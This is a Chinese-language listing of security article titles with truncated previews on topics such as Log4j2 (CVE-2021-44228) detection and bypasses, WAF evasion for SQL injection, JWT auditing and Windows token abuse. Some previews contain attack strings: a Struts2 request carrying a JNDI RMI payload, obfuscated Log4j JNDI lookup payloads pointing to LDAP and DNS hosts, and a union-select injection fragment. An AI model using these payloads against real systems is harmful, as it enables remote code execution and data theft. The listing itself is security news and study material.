渗透技巧
检测涉及CVE-2021-44228影响产品
Apache Struts 2http://127.0.0.1:8080/struts2-showcase/token/transfer4.action -d struts.token.name='${jndi:rmi://127.0 .0.1:1099/ylbtsl}'http://loca...
在线杀软对比源码+数据源(自用)
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利...
实战 | BypassD盾之SQL注入绕过总结
SQLServer特性空格可以由其它字符替代select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin位置①可以利用其它控制字符...
log4j2 的0day是如何被作者发现的
开篇上一篇文章log4j2的codeql规则我看了codeql官方的规则,然后发现了一个2020年的规则,从而推出很可能是codeql挖到的(现在哪个大佬还一个个代码看idea挖洞...
致远A8产品Log4j2存在命令执行
点击蓝字 · 关注我们01漏洞描述 致远互联A8+是面向集团化、国际化、产业链和大型组织机构、涉外工作组织及组织群,针对其 组织范围内外协...
代码审计 | JWT Token
0x00 介绍JSON Web Token 缩写成 JWT,被用于和服务器的认证场景中,这一点有点类似于 Cookie 里的 Session id,关于这两者的区别可以看本文尾部的参考链接。...
本机号码一键登录原理与应用
很多APP的目前都支持“本机号码一键登录”功能。本机号码一键登录是基于运营商独有网关认证能力推出的账号认证产品。用户只需一键授权,即可实现以本机号码注册...
整理log4j bypass
推来源:${jndi:ldap://127.0.0.1:1099/obj}${${lower:jnd}${lower:${upper:ı}}:ldap://...}${jndi:dns://aeutbj.example.com/ext}${jndi:${lower:l}${lower:...
Windows Token原理及利用
STATEMENT声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。雷神众测...
每日安全动态推送(12-14)
Tencent Security Xuanwu Lab Daily News• PS4 9.00 Kernel Exploit:https://github.com/ChendoChap/pOOBs4 ・ 有研究员发布 PS4...